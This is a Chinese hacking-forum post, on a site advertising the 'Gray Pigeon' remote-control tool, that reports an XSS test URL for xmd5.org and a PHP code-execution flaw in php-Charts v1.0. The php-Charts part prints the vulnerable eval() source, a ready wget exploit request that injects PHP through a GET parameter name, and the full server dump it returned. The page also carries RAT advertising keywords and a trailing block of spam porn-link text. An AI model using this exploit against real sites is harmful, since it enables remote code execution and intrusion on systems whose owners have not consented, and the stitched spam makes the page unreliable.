灰鴿子遠程控制軟件

用戶名  找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 10253|回復: 0
打印 上一主題 下一主題

Xmd5(xmd5.org)Xss存在跨站漏洞可能會被入侵

[復制鏈接]
跳轉到指定樓層
樓主
發表于 2013-1-20 16:45:54 | 只看該作者 |只看大圖 回帖獎勵 |正序瀏覽 |閱讀模式
Xmd5(xmd5.org)Xss存在跨站漏洞可能會被入侵
我們在info=后面隨便輸入一些字符
  http://www.xmd5.org/md5/getpasssu.asp?info=h3art



php-Charts 任意PHP代碼執行缺陷及修復
影響程序: php-chart_v1.0
程序官方: http://php-charts.com/
缺陷類型: PHP Code Execution.
===============================================================
測試平臺系統: Debian squeeze 6.0.6
服務器軟件版本: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
  
================================================================
關于程序介紹:
Php-Charts is basically a class which can be used to generate
different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)
using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
缺陷分析
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
         require("../lib/phpchart.class.php");
         $color_var=array("txt_col","line_col","bg_color");
         $cname=$_GET["type"];
         $chart=new PHPChart($cname);
  
         foreach($_GET as $key=>$value)
         {
                 if($value!="")
                 {
                         if(in_array($key,$color_var))
                         eval('$chart->'.$key.'="#'.$value.'";');
                         else if($value=='yes')
                         eval('$chart->'.$key.'=true;');
                         else if($value=='no')
                         eval('$chart->'.$key.'=false;');
                         else if(is_numeric($value))
                         eval('$chart->'.$key.'='.$value.';');
                         else
                         eval('$chart->'.$key."='".$value."';");
                 }
         }
         $chart->genChart();
  
  
  
  
利用:
  
root@debian:/tmp# wget 'http:// www.dumiaotech.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16--  http://www.dumiaotech.com//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
  
     [ <=>                                                                                        ] 1,917       --.-K/s   in 0s
  
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
  
  
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
   ["DOCUMENT_ROOT"]=>
   string(28) "/etc/apache2/htdocs/hacker1/"
   ["GATEWAY_INTERFACE"]=>
   string(7) "CGI/1.1"
   ["HTTP_ACCEPT"]=>
   string(3) "*/*"
   ["HTTP_CLIENT_IP"]=>
   string(9) "127.0.0.1"
   ["HTTP_HOST"]=>
   string(11) "hacker1.own"
   ["HTTP_USER_AGENT"]=>
   string(21) "Wget/1.12 (linux-gnu)"
   ["HTTP_VIA"]=>
   string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
   ["HTTP_X_FORWARDED_FOR"]=>
   string(9) "127.0.0.1"
   ["PATH"]=>
   string(4) "/bin"
   ["PHPRC"]=>
   string(14) "/etc/php5/cgi/"
   ["QUERY_STRING"]=>
   string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
   ["REDIRECT_STATUS"]=>
   string(3) "200"
   ["REMOTE_ADDR"]=>
   string(9) "127.0.0.1"
   ["REMOTE_PORT"]=>
   string(5) "60830"
   ["REQUEST_METHOD"]=>
   string(3) "GET"
   ["REQUEST_URI"]=>
   string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
   ["SCRIPT_FILENAME"]=>
   string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
   ["SCRIPT_NAME"]=>
   string(30) "/wp/chart/chart/wizard/url.php"
   ["SERVER_ADDR"]=>
   string(9) "127.0.0.1"
   ["SERVER_ADMIN"]=>
   string(21) "webmaster@hacker1.own"
   ["SERVER_NAME"]=>
   string(11) "hacker1.own"
   ["SERVER_PORT"]=>
   string(2) "80"
   ["SERVER_PROTOCOL"]=>
   string(8) "HTTP/1.1"
   ["SERVER_SIGNATURE"]=>
   string(0) ""
   ["SERVER_SOFTWARE"]=>
   string(6) "Apache"
   ["UNIQUE_ID"]=>
   string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
   ["PHP_SELF"]=>
   string(30) "/wp/chart/chart/wizard/url.php"
   ["REQUEST_TIME"]=>
   int(1358302756)
}
  
Notice: Undefined variable:  in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
  
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
  灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件
  
Example 2:
  
灰鴿子,灰鴿子使用教程,灰鴿子下載,灰鴿子購買,灰鴿子遠程控制軟件
評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復

舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

Archiver|手機版|小黑屋|灰鴿子遠程控制軟件|灰鴿子遠程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-3-13 10:37 , Processed in 0.088559 second(s), 26 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復 返回頂部 返回列表
主站蜘蛛池模板: 在线精品免费视频无码的| 无码专区国产无套粉嫩白浆内射| 高清无码午夜福利在线观看 | 无码中文字幕乱码一区| 少妇性饥渴无码A区免费 | av中文无码乱人伦在线观看| 国产av无码专区亚洲av毛片搜| 人妻丰满av无码中文字幕| 国产成人AV一区二区三区无码 | 国产精品无码A∨精品影院 | 亚洲乱亚洲乱少妇无码| 亚洲av无码兔费综合| 中文精品无码中文字幕无码专区 | 亚洲中文字幕无码av永久| 久久精品国产亚洲AV无码麻豆| 无码精品人妻一区二区三区影院 | 人妻少妇看A偷人无码精品| 亚洲av永久无码精品秋霞电影影院 | 亚洲美免无码中文字幕在线| 人妻丰满熟妞av无码区| 亚洲AV无码之日韩精品| 天堂Av无码Av一区二区三区| 色爱无码AV综合区| 无码中文人妻在线一区 | 无码日韩人妻AV一区二区三区| 久久久久久国产精品免费无码| 熟妇人妻系列aⅴ无码专区友真希| 成年男人裸j照无遮挡无码| 亚洲av片不卡无码久久| 亚洲AV无码国产丝袜在线观看 | 亚洲Av永久无码精品黑人| 无码国产色欲XXXXX视频| 亚洲成a人片在线观看无码| 一区二区三区人妻无码| 中文字幕人妻无码专区| 亚洲VA成无码人在线观看天堂| 亚洲中文字幕无码永久在线| 国产丰满乱子伦无码专区| 亚洲国产一二三精品无码| 久久久久亚洲av无码尤物| 无码少妇一区二区三区|